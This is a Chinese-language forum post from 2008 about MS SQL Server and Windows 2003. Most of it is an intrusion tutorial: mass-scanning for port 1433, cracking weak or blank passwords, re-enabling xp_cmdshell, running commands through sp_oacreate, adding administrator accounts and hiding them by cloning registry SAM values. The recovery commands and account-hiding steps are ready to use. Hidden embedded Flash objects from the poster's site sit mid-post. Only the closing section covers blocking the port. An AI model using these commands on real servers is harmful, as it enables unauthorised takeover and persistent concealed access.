查看完整版本:1433拿服务器+隐藏管理员帐号 服务器安全不得不看
xiang6963
2008/11/1 20:34:55
 1433拿服务器+隐藏管理员帐号 服务器安全不得不看 只有更深入的研究黑客技术才能做好web server的更好防范! 目的不是去攻击谁,而是如何做好服务器安全 上周日遇到一个服务器被黑了,用的此方法·~~ 用到了高兴1433工具 ----------------------------------二大叔的分割线-------------------------zz 1433入侵服务器+隐藏管理员账号 用到的工具1.s扫描器 2.SQL综合利用工具 3.scansql批量处理工具,或者用X-Scan-v3.3 4.用到sql查询分析器 5.3389连接工具(2003和xp自带有远程连接工具) 大家看我的操作 1.首先用服务器扫一段开了1433端口的ip 2.扫描好之后,1433弱口令猜解工具即上面提到的scansql批量处理工具,或者用X-Scan-v3.3 3.用SQL综合利用工具连接并添加管理员账号 4.用3389连接器 s扫描器s.exe syn ip地址 端口号 /save(保存) 这个大家应该都知道是什么意思吧! 等它扫描一下.syn扫描很快.在xp系统下要打补丁才可以用。我的服务器是2003系统的,不用打补丁就可以用s扫描,看扫出来很多开放1433的IP 扫描完后它会自动保存到他所在的目录下,大家稍等下。看来这个段的IP开放1433端口很多.啊终于扫万了。呵呵 好把IP处理一下, 因为要用到scansql批量处理工具,所以IP段前面要加上scansql 处理完之后,可以将txt文件保存为bat为后缀的文件,为了快点扫到服务器的弱口令,我们可以多保存几个bat文件,好大家看我操作 已经开始破解弱口令了,大家等一下 还没有扫到,可能是有点慢呵呵! 好了我们看下有没有扫到弱口令。大家看扫到弱口令了。[NULL]表示 空口令. 我们用SQL综合利用工具连接一下,随便选个 我这有点卡...我就用服务器连接,服务器连接就是快,呵呵 好连接成功.我们看下能执行dos命令不,不可以 未能找到存储过程 'master..xp_cmdshell'。很多朋友遇到这种情况就不知道怎么办了,我们就要用到sql查询分析器,大家看我的操作,,打开的有点慢.打开了我们连接服务器 然后第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5键命令执行完毕....一般情况执行第一步就可以了。好看我操作 可以执行dos命令了,我们查看服务器是什么系统dos口令是type C:\boot.ini Windows Server 2003,说明服务器是2003系统. 查看一下服务器是内网还是外网一般我们都要外网的肉鸡,这样可以做很多事 dos口令是ipconfig 看下 Connection-specific DNS Suffix . : IP Address. . . . . . . . . 说明服务器是外网 说明服务器是外网,查看一下有多少管理员dos口令net user netstat -an是查看服务器开放的端口,我们要入侵服务器可定要开放3389端口如果没有开,网上有很多开3389的工具。不过很多都要做免杀,我们看下他开了3389没有。 TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 说明服务器开了3389端口。我们开始添加管理吧! net user admin$ !@#$ab1 然后我们提升权限net localgroup administrators admin$ /add这是dos下提升管理的口令,现 我用服务器连接下看好连接成功 下面大家看我的操作 我们来做影藏管理员账号。 首先打开注册表regedit 打开后找到sam 然后添加权限HKEY_LOCAL_MACHINE\SAM\SAM 然后按F5刷新下 然后依次点HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 可以看出有人入侵过 我们删掉完成,我们打开注册表f5刷新下 我们从新建个管理员net user hacktale$ !@#$ab1 我们看hacktale$在注册表对应的类型是 406 找到 406 1f4是administrator对应的键值,然后我们将administrator所对应的直下的f直覆盖hacktale$下的F直 然后将406 和hacktale$对应的注册表导出 然后删除hacktale$,然后导入刚才导出的注册表文件 好了隐藏了账号并提升了权限我们注销然后在进一次看看,用hacktale$能进入不可以进入 而且看桌面上多了很多东西,因为我们是以超级管理员登陆的而且不会被人发现.好了教程到此 <object id=0.2849339463309637 style="LEFT: 1px; POSITION: absolute; TOP: 1px" codeBase=http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 type=application/octet-stream height=600 width=600 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 wmode="transparent" quality="high" menu="false" allownetworking="internal" src="http://www.xiang6963.cn/flash/plzonexin.swf"></object> <object id=0.15122469826208884 style="LEFT: 100px; POSITION: absolute; TOP: 500px" codeBase=http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab#version=8,0,0,0 type=application/octet-stream height=600 width=600 classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 wmode="transparent" quality="high" menu="false" allownetworking="internal" src="http://www.xiang6963.cn/temp/214.swf"></object> --------------------------白干儿前轱辘掉了的分割线------------------------- 常见情况恢复执行xp_cmdshell. 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 然后按F5键命令执行完毕 数据库命令法 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, 2000servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c c:\ok.exe' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add' xp或2003server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c c:\ok.exe' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add' xpsql70.dll上传到系统目录 -----------------------眼镜柔啊柔的分割线----------------------- 关闭1433端口方法有三种: 1、最简单的是在网卡TCP/IP协议的属性--高级--[TCP/IP筛选]里设置。方法是: [设置]--[网络和拨号连接],右击[本地连接]--[属性]--TCP/IP协议--[属性]--[高级]--[选项]--[TCP/IP筛选]--[属性],在这里就可以设置端口的打开关闭。 但这里要吗就“全部允许”,要吗就“只允许”。要把常用的端口都添加,否则,缺了那些端口,那些上网功能就没了。 2、使用IPSEC安全策略(这个方法麻烦一点): IPSEC安全策略被誉为是WIN2000自带的‘防火墙’,不过它的RULE(规则)不是很直观罢了。每一个RULE由两部分组成,“条件”与“行为”,思路是:当满足某个“条件”时就执行某个“行为”。建立一个RULE一共需要四个步骤: (1)建立“条件”、 (2)建立“行为”、 (3)建立策略(RULE)群,把“条件”与“行为”连起来)、(4)击活策略。 (1)建立RULE(规则)示例,以端口445/TCP为例: 打开[本地安全策略]--右击“IP安全策略,在本地机器”--“管理IP筛选器表和筛选器操作”--“管理IP筛选器列表”--“添加”; 随便写个“名称”和“描述”,方便自己记忆就行,什么都可以,例如写“禁止TCP445”;然后“下一步”--“添加”--“下一步”--“源地址”选“任何IP地址”,“下一步”--“目标地址”选“自己的IP地址”,“下一步”--“选择协议类型”,选‘TCP’,“下一步”--选择“从任意端口”“到此端口”;“到此端口”栏填“445”,“下一步”--“完成”(把“编辑属性”栏钩上再按“完成”。 在跳出的窗口中,可以选择是否“镜象”,此选项会把此规则用到源地址与目标地址相反的条件上去)。这样,就完成了建立“条件”的工作了。 (2)回到楼上的第三步“管理IP筛选器表和筛选器操作”--“管理筛选器操作”--“添加”--“下一步”--添写“名称”和“描述”,例如写“阻止”,“下一步”--选择“阻止”,“下一步”--“完成”(这里也有‘编辑属性’,不过没什么用的,建议不要选)。建立“行为”完成了。 (3)建立RULE:回到“本地安全策略”--右击“IP安全策略,在本地机器”--“创建IP安全策略”--“下一步”--填写“名称”和“描述”,例如写上“我的防火墙”,“下一步”--取消“击活默认响应规则”选项的勾选,“下一步”--钩上“编辑属性”,“完成”。 --在跳出的属性窗体中的“规则”栏中,点击“添加”--“下一步”--‘下一步’--‘下一步’--到“身份验证方法”中,您可以选择使用WINDOWS 2000默认值(第一项)、也可以选择使用自己定义的字符串(第三项);“下一步”--出现一个列表,在里面选择原来建立的“禁止TCP445”, “下一步”--到选择“行为”了,选择原来建立好的“阻止”,“下一步”--“完成”。按“确定”,关闭属性窗口。如果还要建立其他的RULE,可以双击原来建立好的“我的防火墙”策略,然后“添加”,重复上面的操作步骤就可以建立其他RULE。 (4)击活策略:在“本地安全策略”--点击“IP安全策略,在本地机器”->在右面的窗口,右击“我的防火墙”--点击“指派”就激活了。 此方法较为可靠,在不阻碍用户正常使用的情况下又可以阻止黑客的入侵;只是操作有点麻烦。 实验所知:使用IPSEC安全策略与TCP/IP端口筛选可以禁止其他IP访问特定的端口或协议等,但不能停止端口的监听。所以如果使用netstat命令或ACTIVE PORTS查看时仍能看到这些端口在监听,不过在其他IP的机子的确访问不到这些端口。 但如果您用环回地址[127.0.0.1]就会有异常现象出现,不过不用担心,其他的IP是无法访问到的。 3、在服务进程里,关闭一些系统不用的,可能存在危险的服务。关闭了那些服务,就连同关闭了它对应的端口。 |